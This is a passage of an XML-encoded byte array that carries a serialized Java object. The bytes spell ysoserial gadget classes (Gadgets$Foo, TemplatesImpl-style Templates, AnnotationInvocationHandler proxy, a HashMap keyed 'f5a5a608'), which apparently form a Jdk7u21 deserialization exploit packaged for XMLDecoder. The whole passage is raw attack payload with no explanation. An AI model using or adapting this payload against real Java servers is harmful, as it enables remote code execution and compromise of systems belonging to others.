index="4110"><byte>0</byte></void><void index="4111"><byte>2</byte></void><void index="4112"><byte>0</byte></void><void index="4113"><byte>33</byte></void><void index="4114"><byte>0</byte></void><void index="4115"><byte>17</byte></void><void index="4116"><byte>0</byte></void><void index="4117"><byte>0</byte></void><void index="4118"><byte>0</byte></void><void index="4119"><byte>10</byte></void><void index="4120"><byte>0</byte></void><void index="4121"><byte>1</byte></void><void index="4122"><byte>0</byte></void><void index="4123"><byte>2</byte></void><void index="4124"><byte>0</byte></void><void index="4125"><byte>35</byte></void><void index="4126"><byte>0</byte></void><void index="4127"><byte>16</byte></void><void index="4128"><byte>0</byte></void><void index="4129"><byte>9</byte></void><void index="4130"><byte>117</byte></void><void index="4131"><byte>113</byte></void><void index="4132"><byte>0</byte></void><void index="4133"><byte>126</byte></void><void index="4134"><byte>0</byte></void><void index="4135"><byte>13</byte></void><void index="4136"><byte>0</byte></void><void index="4137"><byte>0</byte></void><void index="4138"><byte>1</byte></void><void index="4139"><byte>-44</byte></void><void index="4140"><byte>-54</byte></void><void index="4141"><byte>-2</byte></void><void index="4142"><byte>-70</byte></void><void index="4143"><byte>-66</byte></void><void index="4144"><byte>0</byte></void><void index="4145"><byte>0</byte></void><void index="4146"><byte>0</byte></void><void index="4147"><byte>50</byte></void><void index="4148"><byte>0</byte></void><void index="4149"><byte>27</byte></void><void index="4150"><byte>10</byte></void><void index="4151"><byte>0</byte></void><void index="4152"><byte>3</byte></void><void index="4153"><byte>0</byte></void><void index="4154"><byte>21</byte></void><void index="4155"><byte>7</byte></void><void index="4156"><byte>0</byte></void><void index="4157"><byte>23</byte></void><void index="4158"><byte>7</byte></void><void 
index="4159"><byte>0</byte></void><void index="4160"><byte>24</byte></void><void index="4161"><byte>7</byte></void><void index="4162"><byte>0</byte></void><void index="4163"><byte>25</byte></void><void index="4164"><byte>1</byte></void><void index="4165"><byte>0</byte></void><void index="4166"><byte>16</byte></void><void index="4167"><byte>115</byte></void><void index="4168"><byte>101</byte></void><void index="4169"><byte>114</byte></void><void index="4170"><byte>105</byte></void><void index="4171"><byte>97</byte></void><void index="4172"><byte>108</byte></void><void index="4173"><byte>86</byte></void><void index="4174"><byte>101</byte></void><void index="4175"><byte>114</byte></void><void index="4176"><byte>115</byte></void><void index="4177"><byte>105</byte></void><void index="4178"><byte>111</byte></void><void index="4179"><byte>110</byte></void><void index="4180"><byte>85</byte></void><void index="4181"><byte>73</byte></void><void index="4182"><byte>68</byte></void><void index="4183"><byte>1</byte></void><void index="4184"><byte>0</byte></void><void index="4185"><byte>1</byte></void><void index="4186"><byte>74</byte></void><void index="4187"><byte>1</byte></void><void index="4188"><byte>0</byte></void><void index="4189"><byte>13</byte></void><void index="4190"><byte>67</byte></void><void index="4191"><byte>111</byte></void><void index="4192"><byte>110</byte></void><void index="4193"><byte>115</byte></void><void index="4194"><byte>116</byte></void><void index="4195"><byte>97</byte></void><void index="4196"><byte>110</byte></void><void index="4197"><byte>116</byte></void><void index="4198"><byte>86</byte></void><void index="4199"><byte>97</byte></void><void index="4200"><byte>108</byte></void><void index="4201"><byte>117</byte></void><void index="4202"><byte>101</byte></void><void index="4203"><byte>5</byte></void><void index="4204"><byte>113</byte></void><void index="4205"><byte>-26</byte></void><void index="4206"><byte>105</byte></void><void 
index="4207"><byte>-18</byte></void><void index="4208"><byte>60</byte></void><void index="4209"><byte>109</byte></void><void index="4210"><byte>71</byte></void><void index="4211"><byte>24</byte></void><void index="4212"><byte>1</byte></void><void index="4213"><byte>0</byte></void><void index="4214"><byte>6</byte></void><void index="4215"><byte>60</byte></void><void index="4216"><byte>105</byte></void><void index="4217"><byte>110</byte></void><void index="4218"><byte>105</byte></void><void index="4219"><byte>116</byte></void><void index="4220"><byte>62</byte></void><void index="4221"><byte>1</byte></void><void index="4222"><byte>0</byte></void><void index="4223"><byte>3</byte></void><void index="4224"><byte>40</byte></void><void index="4225"><byte>41</byte></void><void index="4226"><byte>86</byte></void><void index="4227"><byte>1</byte></void><void index="4228"><byte>0</byte></void><void index="4229"><byte>4</byte></void><void index="4230"><byte>67</byte></void><void index="4231"><byte>111</byte></void><void index="4232"><byte>100</byte></void><void index="4233"><byte>101</byte></void><void index="4234"><byte>1</byte></void><void index="4235"><byte>0</byte></void><void index="4236"><byte>15</byte></void><void index="4237"><byte>76</byte></void><void index="4238"><byte>105</byte></void><void index="4239"><byte>110</byte></void><void index="4240"><byte>101</byte></void><void index="4241"><byte>78</byte></void><void index="4242"><byte>117</byte></void><void index="4243"><byte>109</byte></void><void index="4244"><byte>98</byte></void><void index="4245"><byte>101</byte></void><void index="4246"><byte>114</byte></void><void index="4247"><byte>84</byte></void><void index="4248"><byte>97</byte></void><void index="4249"><byte>98</byte></void><void index="4250"><byte>108</byte></void><void index="4251"><byte>101</byte></void><void index="4252"><byte>1</byte></void><void index="4253"><byte>0</byte></void><void index="4254"><byte>18</byte></void><void 
index="4255"><byte>76</byte></void><void index="4256"><byte>111</byte></void><void index="4257"><byte>99</byte></void><void index="4258"><byte>97</byte></void><void index="4259"><byte>108</byte></void><void index="4260"><byte>86</byte></void><void index="4261"><byte>97</byte></void><void index="4262"><byte>114</byte></void><void index="4263"><byte>105</byte></void><void index="4264"><byte>97</byte></void><void index="4265"><byte>98</byte></void><void index="4266"><byte>108</byte></void><void index="4267"><byte>101</byte></void><void index="4268"><byte>84</byte></void><void index="4269"><byte>97</byte></void><void index="4270"><byte>98</byte></void><void index="4271"><byte>108</byte></void><void index="4272"><byte>101</byte></void><void index="4273"><byte>1</byte></void><void index="4274"><byte>0</byte></void><void index="4275"><byte>4</byte></void><void index="4276"><byte>116</byte></void><void index="4277"><byte>104</byte></void><void index="4278"><byte>105</byte></void><void index="4279"><byte>115</byte></void><void index="4280"><byte>1</byte></void><void index="4281"><byte>0</byte></void><void index="4282"><byte>3</byte></void><void index="4283"><byte>70</byte></void><void index="4284"><byte>111</byte></void><void index="4285"><byte>111</byte></void><void index="4286"><byte>1</byte></void><void index="4287"><byte>0</byte></void><void index="4288"><byte>12</byte></void><void index="4289"><byte>73</byte></void><void index="4290"><byte>110</byte></void><void index="4291"><byte>110</byte></void><void index="4292"><byte>101</byte></void><void index="4293"><byte>114</byte></void><void index="4294"><byte>67</byte></void><void index="4295"><byte>108</byte></void><void index="4296"><byte>97</byte></void><void index="4297"><byte>115</byte></void><void index="4298"><byte>115</byte></void><void index="4299"><byte>101</byte></void><void index="4300"><byte>115</byte></void><void index="4301"><byte>1</byte></void><void index="4302"><byte>0</byte></void><void 
index="4303"><byte>37</byte></void><void index="4304"><byte>76</byte></void><void index="4305"><byte>121</byte></void><void index="4306"><byte>115</byte></void><void index="4307"><byte>111</byte></void><void index="4308"><byte>115</byte></void><void index="4309"><byte>101</byte></void><void index="4310"><byte>114</byte></void><void index="4311"><byte>105</byte></void><void index="4312"><byte>97</byte></void><void index="4313"><byte>108</byte></void><void index="4314"><byte>47</byte></void><void index="4315"><byte>112</byte></void><void index="4316"><byte>97</byte></void><void index="4317"><byte>121</byte></void><void index="4318"><byte>108</byte></void><void index="4319"><byte>111</byte></void><void index="4320"><byte>97</byte></void><void index="4321"><byte>100</byte></void><void index="4322"><byte>115</byte></void><void index="4323"><byte>47</byte></void><void index="4324"><byte>117</byte></void><void index="4325"><byte>116</byte></void><void index="4326"><byte>105</byte></void><void index="4327"><byte>108</byte></void><void index="4328"><byte>47</byte></void><void index="4329"><byte>71</byte></void><void index="4330"><byte>97</byte></void><void index="4331"><byte>100</byte></void><void index="4332"><byte>103</byte></void><void index="4333"><byte>101</byte></void><void index="4334"><byte>116</byte></void><void index="4335"><byte>115</byte></void><void index="4336"><byte>36</byte></void><void index="4337"><byte>70</byte></void><void index="4338"><byte>111</byte></void><void index="4339"><byte>111</byte></void><void index="4340"><byte>59</byte></void><void index="4341"><byte>1</byte></void><void index="4342"><byte>0</byte></void><void index="4343"><byte>10</byte></void><void index="4344"><byte>83</byte></void><void index="4345"><byte>111</byte></void><void index="4346"><byte>117</byte></void><void index="4347"><byte>114</byte></void><void index="4348"><byte>99</byte></void><void index="4349"><byte>101</byte></void><void index="4350"><byte>70</byte></void><void 
index="4351"><byte>105</byte></void><void index="4352"><byte>108</byte></void><void index="4353"><byte>101</byte></void><void index="4354"><byte>1</byte></void><void index="4355"><byte>0</byte></void><void index="4356"><byte>12</byte></void><void index="4357"><byte>71</byte></void><void index="4358"><byte>97</byte></void><void index="4359"><byte>100</byte></void><void index="4360"><byte>103</byte></void><void index="4361"><byte>101</byte></void><void index="4362"><byte>116</byte></void><void index="4363"><byte>115</byte></void><void index="4364"><byte>46</byte></void><void index="4365"><byte>106</byte></void><void index="4366"><byte>97</byte></void><void index="4367"><byte>118</byte></void><void index="4368"><byte>97</byte></void><void index="4369"><byte>12</byte></void><void index="4370"><byte>0</byte></void><void index="4371"><byte>10</byte></void><void index="4372"><byte>0</byte></void><void index="4373"><byte>11</byte></void><void index="4374"><byte>7</byte></void><void index="4375"><byte>0</byte></void><void index="4376"><byte>26</byte></void><void index="4377"><byte>1</byte></void><void index="4378"><byte>0</byte></void><void index="4379"><byte>35</byte></void><void index="4380"><byte>121</byte></void><void index="4381"><byte>115</byte></void><void index="4382"><byte>111</byte></void><void index="4383"><byte>115</byte></void><void index="4384"><byte>101</byte></void><void index="4385"><byte>114</byte></void><void index="4386"><byte>105</byte></void><void index="4387"><byte>97</byte></void><void index="4388"><byte>108</byte></void><void index="4389"><byte>47</byte></void><void index="4390"><byte>112</byte></void><void index="4391"><byte>97</byte></void><void index="4392"><byte>121</byte></void><void index="4393"><byte>108</byte></void><void index="4394"><byte>111</byte></void><void index="4395"><byte>97</byte></void><void index="4396"><byte>100</byte></void><void index="4397"><byte>115</byte></void><void index="4398"><byte>47</byte></void><void 
index="4399"><byte>117</byte></void><void index="4400"><byte>116</byte></void><void index="4401"><byte>105</byte></void><void index="4402"><byte>108</byte></void><void index="4403"><byte>47</byte></void><void index="4404"><byte>71</byte></void><void index="4405"><byte>97</byte></void><void index="4406"><byte>100</byte></void><void index="4407"><byte>103</byte></void><void index="4408"><byte>101</byte></void><void index="4409"><byte>116</byte></void><void index="4410"><byte>115</byte></void><void index="4411"><byte>36</byte></void><void index="4412"><byte>70</byte></void><void index="4413"><byte>111</byte></void><void index="4414"><byte>111</byte></void><void index="4415"><byte>1</byte></void><void index="4416"><byte>0</byte></void><void index="4417"><byte>16</byte></void><void index="4418"><byte>106</byte></void><void index="4419"><byte>97</byte></void><void index="4420"><byte>118</byte></void><void index="4421"><byte>97</byte></void><void index="4422"><byte>47</byte></void><void index="4423"><byte>108</byte></void><void index="4424"><byte>97</byte></void><void index="4425"><byte>110</byte></void><void index="4426"><byte>103</byte></void><void index="4427"><byte>47</byte></void><void index="4428"><byte>79</byte></void><void index="4429"><byte>98</byte></void><void index="4430"><byte>106</byte></void><void index="4431"><byte>101</byte></void><void index="4432"><byte>99</byte></void><void index="4433"><byte>116</byte></void><void index="4434"><byte>1</byte></void><void index="4435"><byte>0</byte></void><void index="4436"><byte>20</byte></void><void index="4437"><byte>106</byte></void><void index="4438"><byte>97</byte></void><void index="4439"><byte>118</byte></void><void index="4440"><byte>97</byte></void><void index="4441"><byte>47</byte></void><void index="4442"><byte>105</byte></void><void index="4443"><byte>111</byte></void><void index="4444"><byte>47</byte></void><void index="4445"><byte>83</byte></void><void index="4446"><byte>101</byte></void><void 
index="4447"><byte>114</byte></void><void index="4448"><byte>105</byte></void><void index="4449"><byte>97</byte></void><void index="4450"><byte>108</byte></void><void index="4451"><byte>105</byte></void><void index="4452"><byte>122</byte></void><void index="4453"><byte>97</byte></void><void index="4454"><byte>98</byte></void><void index="4455"><byte>108</byte></void><void index="4456"><byte>101</byte></void><void index="4457"><byte>1</byte></void><void index="4458"><byte>0</byte></void><void index="4459"><byte>31</byte></void><void index="4460"><byte>121</byte></void><void index="4461"><byte>115</byte></void><void index="4462"><byte>111</byte></void><void index="4463"><byte>115</byte></void><void index="4464"><byte>101</byte></void><void index="4465"><byte>114</byte></void><void index="4466"><byte>105</byte></void><void index="4467"><byte>97</byte></void><void index="4468"><byte>108</byte></void><void index="4469"><byte>47</byte></void><void index="4470"><byte>112</byte></void><void index="4471"><byte>97</byte></void><void index="4472"><byte>121</byte></void><void index="4473"><byte>108</byte></void><void index="4474"><byte>111</byte></void><void index="4475"><byte>97</byte></void><void index="4476"><byte>100</byte></void><void index="4477"><byte>115</byte></void><void index="4478"><byte>47</byte></void><void index="4479"><byte>117</byte></void><void index="4480"><byte>116</byte></void><void index="4481"><byte>105</byte></void><void index="4482"><byte>108</byte></void><void index="4483"><byte>47</byte></void><void index="4484"><byte>71</byte></void><void index="4485"><byte>97</byte></void><void index="4486"><byte>100</byte></void><void index="4487"><byte>103</byte></void><void index="4488"><byte>101</byte></void><void index="4489"><byte>116</byte></void><void index="4490"><byte>115</byte></void><void index="4491"><byte>0</byte></void><void index="4492"><byte>33</byte></void><void index="4493"><byte>0</byte></void><void index="4494"><byte>2</byte></void><void 
index="4495"><byte>0</byte></void><void index="4496"><byte>3</byte></void><void index="4497"><byte>0</byte></void><void index="4498"><byte>1</byte></void><void index="4499"><byte>0</byte></void><void index="4500"><byte>4</byte></void><void index="4501"><byte>0</byte></void><void index="4502"><byte>1</byte></void><void index="4503"><byte>0</byte></void><void index="4504"><byte>26</byte></void><void index="4505"><byte>0</byte></void><void index="4506"><byte>5</byte></void><void index="4507"><byte>0</byte></void><void index="4508"><byte>6</byte></void><void index="4509"><byte>0</byte></void><void index="4510"><byte>1</byte></void><void index="4511"><byte>0</byte></void><void index="4512"><byte>7</byte></void><void index="4513"><byte>0</byte></void><void index="4514"><byte>0</byte></void><void index="4515"><byte>0</byte></void><void index="4516"><byte>2</byte></void><void index="4517"><byte>0</byte></void><void index="4518"><byte>8</byte></void><void index="4519"><byte>0</byte></void><void index="4520"><byte>1</byte></void><void index="4521"><byte>0</byte></void><void index="4522"><byte>1</byte></void><void index="4523"><byte>0</byte></void><void index="4524"><byte>10</byte></void><void index="4525"><byte>0</byte></void><void index="4526"><byte>11</byte></void><void index="4527"><byte>0</byte></void><void index="4528"><byte>1</byte></void><void index="4529"><byte>0</byte></void><void index="4530"><byte>12</byte></void><void index="4531"><byte>0</byte></void><void index="4532"><byte>0</byte></void><void index="4533"><byte>0</byte></void><void index="4534"><byte>47</byte></void><void index="4535"><byte>0</byte></void><void index="4536"><byte>1</byte></void><void index="4537"><byte>0</byte></void><void index="4538"><byte>1</byte></void><void index="4539"><byte>0</byte></void><void index="4540"><byte>0</byte></void><void index="4541"><byte>0</byte></void><void index="4542"><byte>5</byte></void><void index="4543"><byte>42</byte></void><void 
index="4544"><byte>-73</byte></void><void index="4545"><byte>0</byte></void><void index="4546"><byte>1</byte></void><void index="4547"><byte>-79</byte></void><void index="4548"><byte>0</byte></void><void index="4549"><byte>0</byte></void><void index="4550"><byte>0</byte></void><void index="4551"><byte>2</byte></void><void index="4552"><byte>0</byte></void><void index="4553"><byte>13</byte></void><void index="4554"><byte>0</byte></void><void index="4555"><byte>0</byte></void><void index="4556"><byte>0</byte></void><void index="4557"><byte>6</byte></void><void index="4558"><byte>0</byte></void><void index="4559"><byte>1</byte></void><void index="4560"><byte>0</byte></void><void index="4561"><byte>0</byte></void><void index="4562"><byte>0</byte></void><void index="4563"><byte>60</byte></void><void index="4564"><byte>0</byte></void><void index="4565"><byte>14</byte></void><void index="4566"><byte>0</byte></void><void index="4567"><byte>0</byte></void><void index="4568"><byte>0</byte></void><void index="4569"><byte>12</byte></void><void index="4570"><byte>0</byte></void><void index="4571"><byte>1</byte></void><void index="4572"><byte>0</byte></void><void index="4573"><byte>0</byte></void><void index="4574"><byte>0</byte></void><void index="4575"><byte>5</byte></void><void index="4576"><byte>0</byte></void><void index="4577"><byte>15</byte></void><void index="4578"><byte>0</byte></void><void index="4579"><byte>18</byte></void><void index="4580"><byte>0</byte></void><void index="4581"><byte>0</byte></void><void index="4582"><byte>0</byte></void><void index="4583"><byte>2</byte></void><void index="4584"><byte>0</byte></void><void index="4585"><byte>19</byte></void><void index="4586"><byte>0</byte></void><void index="4587"><byte>0</byte></void><void index="4588"><byte>0</byte></void><void index="4589"><byte>2</byte></void><void index="4590"><byte>0</byte></void><void index="4591"><byte>20</byte></void><void index="4592"><byte>0</byte></void><void 
index="4593"><byte>17</byte></void><void index="4594"><byte>0</byte></void><void index="4595"><byte>0</byte></void><void index="4596"><byte>0</byte></void><void index="4597"><byte>10</byte></void><void index="4598"><byte>0</byte></void><void index="4599"><byte>1</byte></void><void index="4600"><byte>0</byte></void><void index="4601"><byte>2</byte></void><void index="4602"><byte>0</byte></void><void index="4603"><byte>22</byte></void><void index="4604"><byte>0</byte></void><void index="4605"><byte>16</byte></void><void index="4606"><byte>0</byte></void><void index="4607"><byte>9</byte></void><void index="4608"><byte>112</byte></void><void index="4609"><byte>116</byte></void><void index="4610"><byte>0</byte></void><void index="4611"><byte>4</byte></void><void index="4612"><byte>80</byte></void><void index="4613"><byte>119</byte></void><void index="4614"><byte>110</byte></void><void index="4615"><byte>114</byte></void><void index="4616"><byte>112</byte></void><void index="4617"><byte>119</byte></void><void index="4618"><byte>1</byte></void><void index="4619"><byte>0</byte></void><void index="4620"><byte>120</byte></void><void index="4621"><byte>115</byte></void><void index="4622"><byte>125</byte></void><void index="4623"><byte>0</byte></void><void index="4624"><byte>0</byte></void><void index="4625"><byte>0</byte></void><void index="4626"><byte>1</byte></void><void index="4627"><byte>0</byte></void><void index="4628"><byte>29</byte></void><void index="4629"><byte>106</byte></void><void index="4630"><byte>97</byte></void><void index="4631"><byte>118</byte></void><void index="4632"><byte>97</byte></void><void index="4633"><byte>120</byte></void><void index="4634"><byte>46</byte></void><void index="4635"><byte>120</byte></void><void index="4636"><byte>109</byte></void><void index="4637"><byte>108</byte></void><void index="4638"><byte>46</byte></void><void index="4639"><byte>116</byte></void><void index="4640"><byte>114</byte></void><void 
index="4641"><byte>97</byte></void><void index="4642"><byte>110</byte></void><void index="4643"><byte>115</byte></void><void index="4644"><byte>102</byte></void><void index="4645"><byte>111</byte></void><void index="4646"><byte>114</byte></void><void index="4647"><byte>109</byte></void><void index="4648"><byte>46</byte></void><void index="4649"><byte>84</byte></void><void index="4650"><byte>101</byte></void><void index="4651"><byte>109</byte></void><void index="4652"><byte>112</byte></void><void index="4653"><byte>108</byte></void><void index="4654"><byte>97</byte></void><void index="4655"><byte>116</byte></void><void index="4656"><byte>101</byte></void><void index="4657"><byte>115</byte></void><void index="4658"><byte>120</byte></void><void index="4659"><byte>114</byte></void><void index="4660"><byte>0</byte></void><void index="4661"><byte>23</byte></void><void index="4662"><byte>106</byte></void><void index="4663"><byte>97</byte></void><void index="4664"><byte>118</byte></void><void index="4665"><byte>97</byte></void><void index="4666"><byte>46</byte></void><void index="4667"><byte>108</byte></void><void index="4668"><byte>97</byte></void><void index="4669"><byte>110</byte></void><void index="4670"><byte>103</byte></void><void index="4671"><byte>46</byte></void><void index="4672"><byte>114</byte></void><void index="4673"><byte>101</byte></void><void index="4674"><byte>102</byte></void><void index="4675"><byte>108</byte></void><void index="4676"><byte>101</byte></void><void index="4677"><byte>99</byte></void><void index="4678"><byte>116</byte></void><void index="4679"><byte>46</byte></void><void index="4680"><byte>80</byte></void><void index="4681"><byte>114</byte></void><void index="4682"><byte>111</byte></void><void index="4683"><byte>120</byte></void><void index="4684"><byte>121</byte></void><void index="4685"><byte>-31</byte></void><void index="4686"><byte>39</byte></void><void index="4687"><byte>-38</byte></void><void index="4688"><byte>32</byte></void><void 
index="4689"><byte>-52</byte></void><void index="4690"><byte>16</byte></void><void index="4691"><byte>67</byte></void><void index="4692"><byte>-53</byte></void><void index="4693"><byte>2</byte></void><void index="4694"><byte>0</byte></void><void index="4695"><byte>1</byte></void><void index="4696"><byte>76</byte></void><void index="4697"><byte>0</byte></void><void index="4698"><byte>1</byte></void><void index="4699"><byte>104</byte></void><void index="4700"><byte>116</byte></void><void index="4701"><byte>0</byte></void><void index="4702"><byte>37</byte></void><void index="4703"><byte>76</byte></void><void index="4704"><byte>106</byte></void><void index="4705"><byte>97</byte></void><void index="4706"><byte>118</byte></void><void index="4707"><byte>97</byte></void><void index="4708"><byte>47</byte></void><void index="4709"><byte>108</byte></void><void index="4710"><byte>97</byte></void><void index="4711"><byte>110</byte></void><void index="4712"><byte>103</byte></void><void index="4713"><byte>47</byte></void><void index="4714"><byte>114</byte></void><void index="4715"><byte>101</byte></void><void index="4716"><byte>102</byte></void><void index="4717"><byte>108</byte></void><void index="4718"><byte>101</byte></void><void index="4719"><byte>99</byte></void><void index="4720"><byte>116</byte></void><void index="4721"><byte>47</byte></void><void index="4722"><byte>73</byte></void><void index="4723"><byte>110</byte></void><void index="4724"><byte>118</byte></void><void index="4725"><byte>111</byte></void><void index="4726"><byte>99</byte></void><void index="4727"><byte>97</byte></void><void index="4728"><byte>116</byte></void><void index="4729"><byte>105</byte></void><void index="4730"><byte>111</byte></void><void index="4731"><byte>110</byte></void><void index="4732"><byte>72</byte></void><void index="4733"><byte>97</byte></void><void index="4734"><byte>110</byte></void><void index="4735"><byte>100</byte></void><void index="4736"><byte>108</byte></void><void 
index="4737"><byte>101</byte></void><void index="4738"><byte>114</byte></void><void index="4739"><byte>59</byte></void><void index="4740"><byte>120</byte></void><void index="4741"><byte>112</byte></void><void index="4742"><byte>115</byte></void><void index="4743"><byte>114</byte></void><void index="4744"><byte>0</byte></void><void index="4745"><byte>50</byte></void><void index="4746"><byte>115</byte></void><void index="4747"><byte>117</byte></void><void index="4748"><byte>110</byte></void><void index="4749"><byte>46</byte></void><void index="4750"><byte>114</byte></void><void index="4751"><byte>101</byte></void><void index="4752"><byte>102</byte></void><void index="4753"><byte>108</byte></void><void index="4754"><byte>101</byte></void><void index="4755"><byte>99</byte></void><void index="4756"><byte>116</byte></void><void index="4757"><byte>46</byte></void><void index="4758"><byte>97</byte></void><void index="4759"><byte>110</byte></void><void index="4760"><byte>110</byte></void><void index="4761"><byte>111</byte></void><void index="4762"><byte>116</byte></void><void index="4763"><byte>97</byte></void><void index="4764"><byte>116</byte></void><void index="4765"><byte>105</byte></void><void index="4766"><byte>111</byte></void><void index="4767"><byte>110</byte></void><void index="4768"><byte>46</byte></void><void index="4769"><byte>65</byte></void><void index="4770"><byte>110</byte></void><void index="4771"><byte>110</byte></void><void index="4772"><byte>111</byte></void><void index="4773"><byte>116</byte></void><void index="4774"><byte>97</byte></void><void index="4775"><byte>116</byte></void><void index="4776"><byte>105</byte></void><void index="4777"><byte>111</byte></void><void index="4778"><byte>110</byte></void><void index="4779"><byte>73</byte></void><void index="4780"><byte>110</byte></void><void index="4781"><byte>118</byte></void><void index="4782"><byte>111</byte></void><void index="4783"><byte>99</byte></void><void 
index="4784"><byte>97</byte></void><void index="4785"><byte>116</byte></void><void index="4786"><byte>105</byte></void><void index="4787"><byte>111</byte></void><void index="4788"><byte>110</byte></void><void index="4789"><byte>72</byte></void><void index="4790"><byte>97</byte></void><void index="4791"><byte>110</byte></void><void index="4792"><byte>100</byte></void><void index="4793"><byte>108</byte></void><void index="4794"><byte>101</byte></void><void index="4795"><byte>114</byte></void><void index="4796"><byte>85</byte></void><void index="4797"><byte>-54</byte></void><void index="4798"><byte>-11</byte></void><void index="4799"><byte>15</byte></void><void index="4800"><byte>21</byte></void><void index="4801"><byte>-53</byte></void><void index="4802"><byte>126</byte></void><void index="4803"><byte>-91</byte></void><void index="4804"><byte>2</byte></void><void index="4805"><byte>0</byte></void><void index="4806"><byte>2</byte></void><void index="4807"><byte>76</byte></void><void index="4808"><byte>0</byte></void><void index="4809"><byte>12</byte></void><void index="4810"><byte>109</byte></void><void index="4811"><byte>101</byte></void><void index="4812"><byte>109</byte></void><void index="4813"><byte>98</byte></void><void index="4814"><byte>101</byte></void><void index="4815"><byte>114</byte></void><void index="4816"><byte>86</byte></void><void index="4817"><byte>97</byte></void><void index="4818"><byte>108</byte></void><void index="4819"><byte>117</byte></void><void index="4820"><byte>101</byte></void><void index="4821"><byte>115</byte></void><void index="4822"><byte>116</byte></void><void index="4823"><byte>0</byte></void><void index="4824"><byte>15</byte></void><void index="4825"><byte>76</byte></void><void index="4826"><byte>106</byte></void><void index="4827"><byte>97</byte></void><void index="4828"><byte>118</byte></void><void index="4829"><byte>97</byte></void><void index="4830"><byte>47</byte></void><void index="4831"><byte>117</byte></void><void 
index="4832"><byte>116</byte></void><void index="4833"><byte>105</byte></void><void index="4834"><byte>108</byte></void><void index="4835"><byte>47</byte></void><void index="4836"><byte>77</byte></void><void index="4837"><byte>97</byte></void><void index="4838"><byte>112</byte></void><void index="4839"><byte>59</byte></void><void index="4840"><byte>76</byte></void><void index="4841"><byte>0</byte></void><void index="4842"><byte>4</byte></void><void index="4843"><byte>116</byte></void><void index="4844"><byte>121</byte></void><void index="4845"><byte>112</byte></void><void index="4846"><byte>101</byte></void><void index="4847"><byte>116</byte></void><void index="4848"><byte>0</byte></void><void index="4849"><byte>17</byte></void><void index="4850"><byte>76</byte></void><void index="4851"><byte>106</byte></void><void index="4852"><byte>97</byte></void><void index="4853"><byte>118</byte></void><void index="4854"><byte>97</byte></void><void index="4855"><byte>47</byte></void><void index="4856"><byte>108</byte></void><void index="4857"><byte>97</byte></void><void index="4858"><byte>110</byte></void><void index="4859"><byte>103</byte></void><void index="4860"><byte>47</byte></void><void index="4861"><byte>67</byte></void><void index="4862"><byte>108</byte></void><void index="4863"><byte>97</byte></void><void index="4864"><byte>115</byte></void><void index="4865"><byte>115</byte></void><void index="4866"><byte>59</byte></void><void index="4867"><byte>120</byte></void><void index="4868"><byte>112</byte></void><void index="4869"><byte>115</byte></void><void index="4870"><byte>114</byte></void><void index="4871"><byte>0</byte></void><void index="4872"><byte>17</byte></void><void index="4873"><byte>106</byte></void><void index="4874"><byte>97</byte></void><void index="4875"><byte>118</byte></void><void index="4876"><byte>97</byte></void><void index="4877"><byte>46</byte></void><void index="4878"><byte>117</byte></void><void index="4879"><byte>116</byte></void><void 
index="4880"><byte>105</byte></void><void index="4881"><byte>108</byte></void><void index="4882"><byte>46</byte></void><void index="4883"><byte>72</byte></void><void index="4884"><byte>97</byte></void><void index="4885"><byte>115</byte></void><void index="4886"><byte>104</byte></void><void index="4887"><byte>77</byte></void><void index="4888"><byte>97</byte></void><void index="4889"><byte>112</byte></void><void index="4890"><byte>5</byte></void><void index="4891"><byte>7</byte></void><void index="4892"><byte>-38</byte></void><void index="4893"><byte>-63</byte></void><void index="4894"><byte>-61</byte></void><void index="4895"><byte>22</byte></void><void index="4896"><byte>96</byte></void><void index="4897"><byte>-47</byte></void><void index="4898"><byte>3</byte></void><void index="4899"><byte>0</byte></void><void index="4900"><byte>2</byte></void><void index="4901"><byte>70</byte></void><void index="4902"><byte>0</byte></void><void index="4903"><byte>10</byte></void><void index="4904"><byte>108</byte></void><void index="4905"><byte>111</byte></void><void index="4906"><byte>97</byte></void><void index="4907"><byte>100</byte></void><void index="4908"><byte>70</byte></void><void index="4909"><byte>97</byte></void><void index="4910"><byte>99</byte></void><void index="4911"><byte>116</byte></void><void index="4912"><byte>111</byte></void><void index="4913"><byte>114</byte></void><void index="4914"><byte>73</byte></void><void index="4915"><byte>0</byte></void><void index="4916"><byte>9</byte></void><void index="4917"><byte>116</byte></void><void index="4918"><byte>104</byte></void><void index="4919"><byte>114</byte></void><void index="4920"><byte>101</byte></void><void index="4921"><byte>115</byte></void><void index="4922"><byte>104</byte></void><void index="4923"><byte>111</byte></void><void index="4924"><byte>108</byte></void><void index="4925"><byte>100</byte></void><void index="4926"><byte>120</byte></void><void index="4927"><byte>112</byte></void><void 
index="4928"><byte>63</byte></void><void index="4929"><byte>64</byte></void><void index="4930"><byte>0</byte></void><void index="4931"><byte>0</byte></void><void index="4932"><byte>0</byte></void><void index="4933"><byte>0</byte></void><void index="4934"><byte>0</byte></void><void index="4935"><byte>12</byte></void><void index="4936"><byte>119</byte></void><void index="4937"><byte>8</byte></void><void index="4938"><byte>0</byte></void><void index="4939"><byte>0</byte></void><void index="4940"><byte>0</byte></void><void index="4941"><byte>16</byte></void><void index="4942"><byte>0</byte></void><void index="4943"><byte>0</byte></void><void index="4944"><byte>0</byte></void><void index="4945"><byte>1</byte></void><void index="4946"><byte>116</byte></void><void index="4947"><byte>0</byte></void><void index="4948"><byte>8</byte></void><void index="4949"><byte>102</byte></void><void index="4950"><byte>53</byte></void><void index="4951"><byte>97</byte></void><void index="4952"><byte>53</byte></void><void index="4953"><byte>97</byte></void><void index="4954"><byte>54</byte></void><void index="4955"><byte>48</byte></void><void index="4956"><byte>56</byte></void><void index="4957"><byte>113</byte></void><void index="4958"><byte>0</byte></void><void index="4959"><byte>126</byte></void><void index="4960"><byte>0</byte></void><void index="4961"><byte>9</byte></void><void index="4962"><byte>120</byte></void><void index="4963"><byte>118</byte></void><void index="4964"><byte>114</byte></void><void index="4965"><byte>0</byte></void><void index="4966"><byte>29</byte></void><void index="4967"><byte>106</byte></void><void index="4968"><byte>97</byte></void><void index="4969"><byte>118</byte></void><void index="4970"><byte>97</byte></void><void index="4971"><byte>120</byte></void><void index="4972"><byte>46</byte></void><void index="4973"><byte>120</byte></void><void index="4974"><byte>109</byte></void><void index="4975"><byte>108</byte></void><void 
